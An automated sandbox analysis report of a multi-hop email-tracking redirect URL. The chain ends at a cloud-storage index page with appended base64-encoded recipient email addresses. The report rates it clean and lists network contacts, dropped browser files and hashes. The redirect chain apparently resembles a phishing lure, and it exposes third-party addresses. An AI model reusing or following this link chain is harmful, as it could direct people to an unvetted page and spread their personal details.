Create Interactive Tour

Analysis Report http://email-tracking.infobip.com/email/1/track/costcobusinessdelivery.com/click?to=cburris%40theroyalstandard.com&webhookdata=39321FE045F2C404DEF77B11BEDB1A315A6A737B151EF1B7A724FC865187CE00D701D0A18FE96353C3029B62A5E133826F3E85CEFA6BC1B79801ABB9212A98D018887FEC62DB9DDD44F2D5735D4B00A4577265F6F6CF2B9483ADF3541020DE0879877D16959923A63BB7F34F252E337EDE5BBD7FAA341E565FBDB772D2D69BE0D961FADC27098565067E48E4948A17A1BA301BA62B298AA2BCEDAD2389CF802F7588D7BB6FFD2343A1C2811590463D903B860956A489FF72462E733524F3D199ECC8CB40F87FB2624AD99589C00C1AABEDF0530BFE19194DD8E769F8BF768826347B63316F354D15160C1C675700C7F443A3D76FDFEBEB5DCD4CE71EBCCC9914B0587DAE1ADD0AC36F084C80CD75EBBFE4B005A90AB0C45CC691616B6F8DA272&url=https://zutwholesale.com/tools/emails/click/order-confirmation/1/button/view-order-status?url=https%3A%2F%2Ft.dripemail2.com/c/eyJhY2NvdW50X2lkIjoiNDgxODMzMSIsImRlbGl2ZXJ5X2lkIjoibTllYTV3NTFkdWFsbWJpaTdhcmgiLCJ1cmwiOiJodHRwczovL3N0b3JhZ2UuZ29vZ2xlYXBpcy5jb20vc2hteGNwZ2JveHNpZzEuYXBwc3BvdC5jb20vaW5kZXguaHRtbCJ9#bGlzYW9ybG9mZkByb2huZXJ0cGFya2NoYW1iZXIub3Jn#YXJ1ZGdlQHdjLmNvbQ==

Overview

General Information

Sample URL:	http://email-tracking.infobip.com/email/1/track/costcobusinessdelivery.com/click?to=cburris%40theroyalstandard.com&webhookdata=39321FE045F2C404DEF77B11BEDB1A315A6A737B151EF1B7A724FC865187CE00D701D0A18FE96353C3029B62A5E133826F3E85CEFA6BC1B79801ABB9212A98D018887FEC62DB9DDD44F2D5735D4B00A4577265F6F6CF2B9483ADF3541020DE0879877D16959923A63BB7F34F252E337EDE5BBD7FAA341E565FBDB772D2D69BE0D961FADC27098565067E48E4948A17A1BA301BA62B298AA2BCEDAD2389CF802F7588D7BB6FFD2343A1C2811590463D903B860956A489FF72462E733524F3D199ECC8CB40F87FB2624AD99589C00C1AABEDF0530BFE19194DD8E769F8BF768826347B63316F354D15160C1C675700C7F443A3D76FDFEBEB5DCD4CE71EBCCC9914B0587DAE1ADD0AC36F084C80CD75EBBFE4B005A90AB0C45CC691616B6F8DA272&url=https://zutwholesale.com/tools/emails/click/order-confirmation/1/button/view-order-status?url=https%3A%2F%2Ft.dripemail2.com/c/eyJhY2NvdW50X2lkIjoiNDgxODMzMSIsImRlbGl2ZXJ5X2lkIjoibTllYTV3NTFkdWFsbWJpaTdhcmgiLCJ1cmwiOiJodHRwczovL3N0b3JhZ2UuZ29vZ2xlYXBpcy5jb20vc2hteGNwZ2JveHNpZzEuYXBwc3BvdC5jb20vaW5kZXguaHRtbCJ9#bGlzYW9ybG9mZkByb2huZXJ0cGFya2NoYW1iZXIub3Jn#YXJ1ZGdlQHdjLmNvbQ==
Analysis ID:	410002
Infos:
Most interesting Screenshot:

Detection

Score:	0
Range:	0 - 100
Whitelisted:	false
Confidence:	80%

Signatures

No high impact signatures.

Classification

Startup

System is w10x64

iexplore.exe (PID: 5892 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)

iexplore.exe (PID: 660 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5892 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

No Sigma rule has matched

Signature Overview

• Compliance
• Networking
• System Summary

Click to jump to signature section

Show All Signature Results

There are no malicious signatures, click here to show all signatures.

Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 23.227.38.32:443 -> 192.168.2.4:49727 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.227.38.32:443 -> 192.168.2.4:49726 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 100.24.77.241:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 100.24.77.241:443 -> 192.168.2.4:49729 version: TLS 1.2

Source: global traffic

HTTP traffic detected: GET /email/1/track/costcobusinessdelivery.com/click?to=cburris%40theroyalstandard.com&webhookdata=39321FE045F2C404DEF77B11BEDB1A315A6A737B151EF1B7A724FC865187CE00D701D0A18FE96353C3029B62A5E133826F3E85CEFA6BC1B79801ABB9212A98D018887FEC62DB9DDD44F2D5735D4B00A4577265F6F6CF2B9483ADF3541020DE0879877D16959923A63BB7F34F252E337EDE5BBD7FAA341E565FBDB772D2D69BE0D961FADC27098565067E48E4948A17A1BA301BA62B298AA2BCEDAD2389CF802F7588D7BB6FFD2343A1C2811590463D903B860956A489FF72462E733524F3D199ECC8CB40F87FB2624AD99589C00C1AABEDF0530BFE19194DD8E769F8BF768826347B63316F354D15160C1C675700C7F443A3D76FDFEBEB5DCD4CE71EBCCC9914B0587DAE1ADD0AC36F084C80CD75EBBFE4B005A90AB0C45CC691616B6F8DA272&url=https://zutwholesale.com/tools/emails/click/order-confirmation/1/button/view-order-status?url=https%3A%2F%2Ft.dripemail2.com/c/eyJhY2NvdW50X2lkIjoiNDgxODMzMSIsImRlbGl2ZXJ5X2lkIjoibTllYTV3NTFkdWFsbWJpaTdhcmgiLCJ1cmwiOiJodHRwczovL3N0b3JhZ2UuZ29vZ2xlYXBpcy5jb20vc2hteGNwZ2JveHNpZzEuYXBwc3BvdC5jb20vaW5kZXguaHRtbCJ9 HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: email-tracking.infobip.comConnection: Keep-Alive

Source: msapplication.xml0.1.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x175d0658,0x01d745bd</date><accdate>0x175d0658,0x01d745bd</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml0.1.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x175d0658,0x01d745bd</date><accdate>0x175d0658,0x01d745bd</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml5.1.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x175d0658,0x01d745bd</date><accdate>0x175d0658,0x01d745bd</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml5.1.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x175d0658,0x01d745bd</date><accdate>0x175d0658,0x01d745bd</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml7.1.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x17642d29,0x01d745bd</date><accdate>0x17642d29,0x01d745bd</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: msapplication.xml7.1.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x17642d29,0x01d745bd</date><accdate>0x17642d29,0x01d745bd</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)

Source: unknown

DNS traffic detected: queries for: email-tracking.infobip.com

Source: msapplication.xml.1.dr	String found in binary or memory: http://www.amazon.com/
Source: msapplication.xml1.1.dr	String found in binary or memory: http://www.google.com/
Source: msapplication.xml2.1.dr	String found in binary or memory: http://www.live.com/
Source: msapplication.xml3.1.dr	String found in binary or memory: http://www.nytimes.com/
Source: msapplication.xml4.1.dr	String found in binary or memory: http://www.reddit.com/
Source: msapplication.xml5.1.dr	String found in binary or memory: http://www.twitter.com/
Source: msapplication.xml6.1.dr	String found in binary or memory: http://www.wikipedia.com/
Source: msapplication.xml7.1.dr	String found in binary or memory: http://www.youtube.com/
Source: imagestore.dat.2.dr	String found in binary or memory: https://storage.googleapis.com/favicon.icoR
Source: ~DFB7AD7B8ED78B5551.TMP.1.dr, {4057ED51-B1B0-11EB-90EB-ECF4BBEA1588}.dat.1.dr	String found in binary or memory: https://storage.googleapis.com/shmxcpgboxsig1.appspot.com/index.html#bGlzYW9ybG9mZkByb2huZXJ0cGFya2N

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726

Source: unknown	HTTPS traffic detected: 23.227.38.32:443 -> 192.168.2.4:49727 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.227.38.32:443 -> 192.168.2.4:49726 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 100.24.77.241:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 100.24.77.241:443 -> 192.168.2.4:49729 version: TLS 1.2

Source: classification engine

Classification label: clean0.win@3/18@3/3

Source: C:\Program Files\internet explorer\iexplore.exe

File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{4057ED4F-B1B0-11EB-90EB-ECF4BBEA1588}.dat

Jump to behavior

Source: C:\Program Files\internet explorer\iexplore.exe

File created: C:\Users\user\AppData\Local\Temp\~DF5AB5BBEAE3F7FB34.TMP

Jump to behavior

Source: C:\Program Files\internet explorer\iexplore.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: unknown	Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5892 CREDAT:17410 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5892 CREDAT:17410 /prefetch:2	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll

Jump to behavior

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation	Path Interception	Process Injection1	Masquerading1	OS Credential Dumping	File and Directory Discovery1	Remote Services	Data from Local System	Exfiltration Over Other Network Medium	Encrypted Channel2	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Process Injection1	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Non-Application Layer Protocol2	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Application Layer Protocol3	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	Ingress Tool Transfer1	SIM Card Swap		Carrier Billing Fraud

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
http://email-tracking.infobip.com/email/1/track/costcobusinessdelivery.com/click?to=cburris%40theroyalstandard.com&webhookdata=39321FE045F2C404DEF77B11BEDB1A315A6A737B151EF1B7A724FC865187CE00D701D0A18FE96353C3029B62A5E133826F3E85CEFA6BC1B79801ABB9212A98D018887FEC62DB9DDD44F2D5735D4B00A4577265F6F6CF2B9483ADF3541020DE0879877D16959923A63BB7F34F252E337EDE5BBD7FAA341E565FBDB772D2D69BE0D961FADC27098565067E48E4948A17A1BA301BA62B298AA2BCEDAD2389CF802F7588D7BB6FFD2343A1C2811590463D903B860956A489FF72462E733524F3D199ECC8CB40F87FB2624AD99589C00C1AABEDF0530BFE19194DD8E769F8BF768826347B63316F354D15160C1C675700C7F443A3D76FDFEBEB5DCD4CE71EBCCC9914B0587DAE1ADD0AC36F084C80CD75EBBFE4B005A90AB0C45CC691616B6F8DA272&url=https://zutwholesale.com/tools/emails/click/order-confirmation/1/button/view-order-status?url=https%3A%2F%2Ft.dripemail2.com/c/eyJhY2NvdW50X2lkIjoiNDgxODMzMSIsImRlbGl2ZXJ5X2lkIjoibTllYTV3NTFkdWFsbWJpaTdhcmgiLCJ1cmwiOiJodHRwczovL3N0b3JhZ2UuZ29vZ2xlYXBpcy5jb20vc2hteGNwZ2JveHNpZzEuYXBwc3BvdC5jb20vaW5kZXguaHRtbCJ9#bGlzYW9ybG9mZkByb2huZXJ0cGFya2NoYW1iZXIub3Jn#YXJ1ZGdlQHdjLmNvbQ==	2%	Virustotal		Browse
http://email-tracking.infobip.com/email/1/track/costcobusinessdelivery.com/click?to=cburris%40theroyalstandard.com&webhookdata=39321FE045F2C404DEF77B11BEDB1A315A6A737B151EF1B7A724FC865187CE00D701D0A18FE96353C3029B62A5E133826F3E85CEFA6BC1B79801ABB9212A98D018887FEC62DB9DDD44F2D5735D4B00A4577265F6F6CF2B9483ADF3541020DE0879877D16959923A63BB7F34F252E337EDE5BBD7FAA341E565FBDB772D2D69BE0D961FADC27098565067E48E4948A17A1BA301BA62B298AA2BCEDAD2389CF802F7588D7BB6FFD2343A1C2811590463D903B860956A489FF72462E733524F3D199ECC8CB40F87FB2624AD99589C00C1AABEDF0530BFE19194DD8E769F8BF768826347B63316F354D15160C1C675700C7F443A3D76FDFEBEB5DCD4CE71EBCCC9914B0587DAE1ADD0AC36F084C80CD75EBBFE4B005A90AB0C45CC691616B6F8DA272&url=https://zutwholesale.com/tools/emails/click/order-confirmation/1/button/view-order-status?url=https%3A%2F%2Ft.dripemail2.com/c/eyJhY2NvdW50X2lkIjoiNDgxODMzMSIsImRlbGl2ZXJ5X2lkIjoibTllYTV3NTFkdWFsbWJpaTdhcmgiLCJ1cmwiOiJodHRwczovL3N0b3JhZ2UuZ29vZ2xlYXBpcy5jb20vc2hteGNwZ2JveHNpZzEuYXBwc3BvdC5jb20vaW5kZXguaHRtbCJ9#bGlzYW9ybG9mZkByb2huZXJ0cGFya2NoYW1iZXIub3Jn#YXJ1ZGdlQHdjLmNvbQ==	0%	Avira URL Cloud	safe

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://www.wikipedia.com/	0%	URL Reputation	safe
http://www.wikipedia.com/	0%	URL Reputation	safe
http://www.wikipedia.com/	0%	URL Reputation	safe

Domains and IPs Download Network PCAP: filtered – full

Contacted Domains

Name	IP	Active	Malicious	Reputation
t.dripemail2.com	100.24.77.241	true	false	unknown
email-tracking.infobip.com	18.198.163.56	true	false	high
zutwholesale.com	23.227.38.32	true	false	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://email-tracking.infobip.com/email/1/track/costcobusinessdelivery.com/click?to=cburris%40theroyalstandard.com&webhookdata=39321FE045F2C404DEF77B11BEDB1A315A6A737B151EF1B7A724FC865187CE00D701D0A18FE96353C3029B62A5E133826F3E85CEFA6BC1B79801ABB9212A98D018887FEC62DB9DDD44F2D5735D4B00A4577265F6F6CF2B9483ADF3541020DE0879877D16959923A63BB7F34F252E337EDE5BBD7FAA341E565FBDB772D2D69BE0D961FADC27098565067E48E4948A17A1BA301BA62B298AA2BCEDAD2389CF802F7588D7BB6FFD2343A1C2811590463D903B860956A489FF72462E733524F3D199ECC8CB40F87FB2624AD99589C00C1AABEDF0530BFE19194DD8E769F8BF768826347B63316F354D15160C1C675700C7F443A3D76FDFEBEB5DCD4CE71EBCCC9914B0587DAE1ADD0AC36F084C80CD75EBBFE4B005A90AB0C45CC691616B6F8DA272&url=https://zutwholesale.com/tools/emails/click/order-confirmation/1/button/view-order-status?url=https%3A%2F%2Ft.dripemail2.com/c/eyJhY2NvdW50X2lkIjoiNDgxODMzMSIsImRlbGl2ZXJ5X2lkIjoibTllYTV3NTFkdWFsbWJpaTdhcmgiLCJ1cmwiOiJodHRwczovL3N0b3JhZ2UuZ29vZ2xlYXBpcy5jb20vc2hteGNwZ2JveHNpZzEuYXBwc3BvdC5jb20vaW5kZXguaHRtbCJ9	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.wikipedia.com/	msapplication.xml6.1.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.amazon.com/	msapplication.xml.1.dr	false		high
http://www.nytimes.com/	msapplication.xml3.1.dr	false		high
http://www.live.com/	msapplication.xml2.1.dr	false		high
http://www.reddit.com/	msapplication.xml4.1.dr	false		high
http://www.twitter.com/	msapplication.xml5.1.dr	false		high
http://www.youtube.com/	msapplication.xml7.1.dr	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
18.198.163.56	email-tracking.infobip.com	United States	16509	AMAZON-02US	false
100.24.77.241	t.dripemail2.com	United States	14618	AMAZON-AESUS	false
23.227.38.32	zutwholesale.com	Canada	13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox Version:	32.0.0 Black Diamond
Analysis ID:	410002
Start date:	10.05.2021
Start time:	18:52:49
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 2m 43s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	browseurl.jbs
Sample URL:	http://email-tracking.infobip.com/email/1/track/costcobusinessdelivery.com/click?to=cburris%40theroyalstandard.com&webhookdata=39321FE045F2C404DEF77B11BEDB1A315A6A737B151EF1B7A724FC865187CE00D701D0A18FE96353C3029B62A5E133826F3E85CEFA6BC1B79801ABB9212A98D018887FEC62DB9DDD44F2D5735D4B00A4577265F6F6CF2B9483ADF3541020DE0879877D16959923A63BB7F34F252E337EDE5BBD7FAA341E565FBDB772D2D69BE0D961FADC27098565067E48E4948A17A1BA301BA62B298AA2BCEDAD2389CF802F7588D7BB6FFD2343A1C2811590463D903B860956A489FF72462E733524F3D199ECC8CB40F87FB2624AD99589C00C1AABEDF0530BFE19194DD8E769F8BF768826347B63316F354D15160C1C675700C7F443A3D76FDFEBEB5DCD4CE71EBCCC9914B0587DAE1ADD0AC36F084C80CD75EBBFE4B005A90AB0C45CC691616B6F8DA272&url=https://zutwholesale.com/tools/emails/click/order-confirmation/1/button/view-order-status?url=https%3A%2F%2Ft.dripemail2.com/c/eyJhY2NvdW50X2lkIjoiNDgxODMzMSIsImRlbGl2ZXJ5X2lkIjoibTllYTV3NTFkdWFsbWJpaTdhcmgiLCJ1cmwiOiJodHRwczovL3N0b3JhZ2UuZ29vZ2xlYXBpcy5jb20vc2hteGNwZ2JveHNpZzEuYXBwc3BvdC5jb20vaW5kZXguaHRtbCJ9#bGlzYW9ybG9mZkByb2huZXJ0cGFya2NoYW1iZXIub3Jn#YXJ1ZGdlQHdjLmNvbQ==
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	3
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	CLEAN
Classification:	clean0.win@3/18@3/3
Cookbook Comments:	Adjust boot time Enable AMSI

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{4057ED4F-B1B0-11EB-90EB-ECF4BBEA1588}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	30296
Entropy (8bit):	1.8467979352395787
Encrypted:	false
SSDEEP:	192:rHZYZy25WxtjifcdDzMBwLBeRDZsfid6jX:r54xIDENO2cP
MD5:	CC26116D830E6FDB0C4B95B3F61B4C2E
SHA1:	17F654C96982D168F1669E585B5F297E06D2A277
SHA-256:	5769A6C531F1C4CD8955C6023456B8DE006355BC74731AC51FC512324070037B
SHA-512:	E3EF0B269DE13259EFAC07D9F5356839FDAE25849369FBC2FDA1CCD7210C0037D616211DEB80CBA81CE329EB2FCB78C89C479990D55C50CED847C1BC1EF587AD
Malicious:	false
Reputation:	low
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{4057ED51-B1B0-11EB-90EB-ECF4BBEA1588}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	24380
Entropy (8bit):	1.6725882259961249
Encrypted:	false
SSDEEP:	48:IwNGcpr4GwpaAG4pQYGrapbSSGQpB+sEGHHpc+eLTGUp8+dGzYpm+tnGoppYtBhY:rTZgQg6mBS6j+s72+elW+jM+/fYt58sg
MD5:	7630FBBB423BAB827FD056602BB16451
SHA1:	DA56E096B6D01B5E52ED0ADF61EDA0F9265166A5
SHA-256:	0DE1C27238D176CE0D078E20242E2450EFEBD5C007761AD8DA81CF862C889B92
SHA-512:	23A4F57CE42DD20D65B9B39BBA43502AB4FF5A8F9D0778AB327F66419435186618ADBA5694278AD2A2ADC6EBF5CB8FED5A8AB9B44D7309E2BFEECEC80A693F30
Malicious:	false
Reputation:	low
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{4057ED52-B1B0-11EB-90EB-ECF4BBEA1588}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	16984
Entropy (8bit):	1.5653620296458748
Encrypted:	false
SSDEEP:	48:IwBGcprwGwpaZG4pQ9GrapbSy9GQpKoBG7HpRzTGIpG:r3ZYQ76dBSyHAowT5A
MD5:	69CD05861A7C57B52B79856037F3DB75
SHA1:	265B610AECA2CA45E90771E4317E3E9470A0ED9D
SHA-256:	DD6ADEF11318A52D877D945C8C8B89EA88C4DFFA3B504B9E3FA6958F2DFA5B9C
SHA-512:	BE4622EFDE8CCF3999AFBA6C6D3D6AD1735E68C4DAC2D630BC12AA1C5E84B77B4DBCCCCB78E3D7B4350EE64F546524AB8B47AF9115E8C3A6B01A0FA5EEFFEA21
Malicious:	false
Reputation:	low
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-17529550060\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	656
Entropy (8bit):	5.101143732583227
Encrypted:	false
SSDEEP:	12:TMHdNMNxOEyUocUo1nWimI002EtM3MHdNMNxOEyUocUo1nWimI00OYGVbkEtMb:2d6NxOTMlSZHKd6NxOTMlSZ7YLb
MD5:	ECF78C7865AD8EE9F1AFC312674672E7
SHA1:	DE705DE049BD22B623E34C930273C7D9197538E4
SHA-256:	D39C779366006E99C6D1D6398CDDD40EEC21233E3D1D9FC7185432D4021C3895
SHA-512:	2D474EDDB0049D5D980C633E10830AF52FB44B0AFC44BB8D69D7E43CCBD404F3514E783686147355017782465F71DFEE67F17375D45D0FA3208244F72476588D
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x175d0658,0x01d745bd</date><accdate>0x175d0658,0x01d745bd</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x175d0658,0x01d745bd</date><accdate>0x175d0658,0x01d745bd</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-18270793970\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	653
Entropy (8bit):	5.132134671386077
Encrypted:	false
SSDEEP:	12:TMHdNMNxe2kuw1nWimI002EtM3MHdNMNxe2kuw1nWimI00OYGkak6EtMb:2d6NxrASZHKd6NxrASZ7Yza7b
MD5:	E7B1C25CDAF065D3A6ED995C7F877842
SHA1:	CFCA6D622FE4D869E9AD59BF2DA0B6993B7B1270
SHA-256:	DD1AEA6A3F2CAAE3107362BF9D242E87D21DA4C4D950AFE3FEB4A2C8B07BEE66
SHA-512:	2259BE6F2D501702514A3938FCE3D86D3F555DD08DE2583ECDD20D2768865B1B300A3A4FE5CC099240D392E8C30EC2E2EC3567DA81B55AA994A31A06F058BDA0
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.amazon.com/"/><date>0x1736e097,0x01d745bd</date><accdate>0x1736e097,0x01d745bd</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.amazon.com/"/><date>0x1736e097,0x01d745bd</date><accdate>0x1736e097,0x01d745bd</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Amazon.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-21706820\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	662
Entropy (8bit):	5.141440581114401
Encrypted:	false
SSDEEP:	12:TMHdNMNxvLyUocUo1nWimI002EtM3MHdNMNxvLyUoB1nWimI00OYGmZEtMb:2d6Nxv2MlSZHKd6Nxv23SZ7Yjb
MD5:	AB9FE76E38878F702FCFBA5ABE9A98C1
SHA1:	6B9DCC640EE1F3EA092E58212AB13E34CA061E55
SHA-256:	49DEDDFE9B47D7FF2375E5C7B6A4D0DD78E5FCC5FA5A788CE775DDE1D333533A
SHA-512:	D39A378F12EAAC848DB1B11A2FCDECE93E404A85C41EEE7BBCC2AC637B47C13902278D058E607E6B132B374CB411F745655F09A726B1E447040D100DD4D4B5E0
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.wikipedia.com/"/><date>0x175d0658,0x01d745bd</date><accdate>0x175d0658,0x01d745bd</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.wikipedia.com/"/><date>0x175d0658,0x01d745bd</date><accdate>0x17642d29,0x01d745bd</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Wikipedia.url"/></tile></msapplication></browserconfig>..

